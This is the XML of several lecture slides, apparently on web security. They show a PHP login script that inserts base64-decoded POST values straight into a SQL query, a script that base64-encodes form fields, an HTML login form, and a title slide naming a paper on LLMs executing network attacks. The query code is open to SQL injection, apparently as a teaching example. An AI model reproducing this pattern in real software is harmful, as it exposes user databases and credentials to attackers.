          <a:xfrm>
            <a:off x="8073195" y="3509814"/>
            <a:ext cx="4106275" cy="490043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">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sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2232186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BE9E2-F756-22B0-D571-D4090D98D668}"/>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E11DC83F-B00C-089C-A609-32CA4AE14A8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10480550" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{757C1EBF-AA66-2370-2F4B-D57685D4E790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="693556" y="1016732"/>
            <a:ext cx="9659696"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lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="557799"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="557799"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="557799"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$username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333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a: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007020"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>base64_decode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sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_POST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['username’]);</a:t>
            </a:r>
            <a:b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br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$password</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333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a: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007020"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>base64_decode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sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_POST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['password’]);</a:t>
            </a:r>
            <a:b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br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$result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333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a: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mysqli_query</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sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$conn</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b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b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SELECT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lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> " .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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FROM</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users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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WHERE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username = '</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'" .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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AND</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password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'"</a:t>
            </a:r>
            <a:endPar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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechteck 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B94197-F829-E1EF-9FE2-01EBCAA89784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231904" y="3420274"/>
            <a:ext cx="2700300" cy="1196858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398758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EF939-98F0-C39E-5ED4-41CBCB1CB2E3}"/>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3EA656B0-4FCD-3327-8596-5E448F1270D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10480550" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{063A39EC-B0D2-7551-02EE-4E08145D4015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696000" y="2667144"/>
            <a:ext cx="10709663"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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="007020"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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document</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.querySelectorAll</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'form'</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forEach</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="007020"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>form</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rgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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tx1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</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form</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.addEventListener</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'submit'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rgbClr val="007020"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>event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rgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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tx1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</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Array</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.from</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form</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.elements</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forEach</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el</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rgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007020"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e</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l</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.value</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rgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</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toBase64(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="007020"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>el</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.value</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tx1"/>
                </a:solidFill>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tx1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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p>
          <a:p>
            <a:pPr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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007700"/>
              </a:solidFill>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAf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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="54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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D87741C-3D6B-1DE9-6A4D-A95B20EE1C99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696000" y="512708"/>
            <a:ext cx="9323065"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&lt;form</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method=</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"POST"</a:t>
            </a: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	&lt;input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type=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"text"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name=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"username"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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	&lt;input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type=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"password"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name=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"password"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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	&lt;input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r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type=</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"submit"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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7700"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3626163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B49C0-DF99-5FD5-1317-F63E735600B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686474" y="487656"/>
            <a:ext cx="11314181" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>On the Feasibility of Using LLMs to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>execute Multistage Network Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> (Singer et al., 2025)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3F2EBD-ACCC-7CAE-F669-44C53F329EEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10914144" y="6532548"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Tabelle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{333749EA-D5DB-742A-2BE6-31C5FAED3B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="743917093"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-155107" y="1700808"/>
          <a:ext cx="11043162" cy="5848978"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1957662">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="941710469"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="908550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1073662999"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="908550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3374448728"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="908550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3910531740"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="908550">
